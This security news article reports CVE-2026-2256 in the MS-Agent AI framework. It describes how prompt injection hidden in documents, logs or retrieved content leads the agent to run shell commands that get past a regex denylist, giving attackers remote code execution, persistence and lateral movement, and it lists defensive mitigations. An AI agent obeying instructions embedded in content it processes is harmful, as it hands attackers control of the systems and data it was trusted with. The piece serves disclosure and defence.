A vulnerability in an AI automation framework could allow attackers to take complete control of systems running the software.
Security researchers have identified a command injection flaw in the ModelScope MS-Agent framework that could enable remote code execution through crafted prompt input, exposing organizations that deploy AI agents with operating system access.
“The real issue here isn’t just input validation, it’s architectural. We are letting AI agents generate and execute arbitrary system commands and then trying to bolt on regex-based validation afterward. That is backwards,” said Ken Johnson, CTO of DryRun Security in an email to eSecurityPlanet.
“The attack itself is almost embarrassingly simple. No credentials, no shell access. Just feed the agent something it reads — a document, a log, a prompt — with the right metacharacters,” said Yagub Rahimov, CEO of Polygraf AI in an email to eSecurityPlanet.
He added, “It picks the Shell tool on its own. It builds the command. It runs [the command]. Full OS execution, API keys, persistence, lateral movement. The agent did exactly what it was designed to do.”
“As AI agents become orchestration layers across enterprise systems, security must evolve from one-dimensional data protection to multi-axis, workflow-aware governance,” said Gidi Cohen, CEO & Co-founder, Bonfy.AI in an email to eSecurityPlanet.
How the MS-Agent Vulnerability Works
MS-Agent is a lightweight framework designed to enable AI agents to autonomously perform tasks and interact with system tools.
By allowing agents to retrieve data, analyze content, and execute commands on the underlying operating system, the framework can automate workflows such as code analysis, document processing, and system administration.
Granting AI agents the ability to execute system-level commands also introduces security risks — particularly when those agents process untrusted or externally sourced data.
The vulnerability, tracked as CVE-2026-2256, stems from the framework’s Shell tool, which allows agents to execute operating system commands to complete tasks.
Researchers found that MS-Agent does not properly sanitize prompt-derived input before passing it to the shell execution layer.
As a result, malicious instructions embedded in external content — such as documents, code repositories, or other retrieved data — may be interpreted as legitimate commands and executed by the agent.
Root Cause: Input Validation Failure
At the core of the issue is the framework’s check_safe() validation function, which attempts to filter unsafe commands using a regular expression–based denylist.
This mechanism is intended to block dangerous commands or keywords before they are executed.
However, denylist-based filtering is considered unreliable because attackers can bypass it using techniques such as command obfuscation, encoding, or alternative shell syntax, allowing malicious input to evade detection.
In this case, specially crafted input can slip past the validation checks and reach the shell execution layer, allowing unauthorized commands to be executed by the agent.
Prompt Injection Enables Remote Code Execution
Researchers demonstrated that attackers can exploit this weakness through a technique known as prompt injection.
In a prompt injection attack, malicious instructions are hidden within otherwise normal-looking text that an AI agent is asked to process.
For example, an attacker could embed harmful shell commands inside a document or code snippet that the agent is instructed to analyze or summarize.
If those instructions bypass the denylist validation, the agent may forward them directly to the Shell tool, resulting in command execution on the host system.
Because the vulnerability can be exploited remotely and does not require authentication or user interaction, it poses a significant risk for organizations deploying AI agents with system-level access.
If successfully exploited, attackers could execute arbitrary operating system commands with the same privileges as the MS-Agent process.
This level of access could enable threat actors to exfiltrate sensitive data, modify or delete critical files, establish persistence mechanisms, or move laterally within enterprise networks.
At the time of publication, the vendor has not provided an official statement or released a patch addressing the vulnerability.
How Organizations Can Mitigate MS-Agent Risk
Until a vendor patch becomes available, organizations using MS-Agent should take steps to reduce potential exposure.
Because the vulnerability could allow malicious input to trigger operating system commands, organizations should focus on limiting the agent’s permissions, restricting access to system tools, and monitoring agent activity for unusual behavior.
- Run MS-Agent in isolated or sandboxed environments, such as containers or ephemeral execution environments, to limit the potential impact of a compromise.
- Enforce the principle of least privilege so the MS-Agent process operates with only the minimum permissions required.
- Restrict or disable the Shell tool when possible, or limit execution to a small set of explicitly approved commands.
- Validate and sanitize all external or retrieved content before it is processed by the agent to reduce the risk of prompt injection.
- Replace denylist-based filtering with strict allowlists that permit only predefined and approved commands.
- Implement network segmentation and continuous monitoring to detect suspicious commands, unusual agent behavior, or unauthorized network activity.
- Regularly test incident response plans and logging processes to ensure teams can quickly detect, investigate, and contain a compromise involving AI agents.
These steps help organizations reduce exposure and contain potential compromises involving AI-driven automation.
AI Agents Expand the Enterprise Attack Surface
The vulnerability highlights a broader challenge as organizations increasingly deploy AI agents to automate operational tasks.
While these systems can streamline workflows and improve efficiency, granting them direct access to system tools and operating system commands also expands the attack surface.
As organizations work to reduce these risks, many are turning to zero trust solutions that limit system access and enforce strict verification for applications, users, and automated agents.
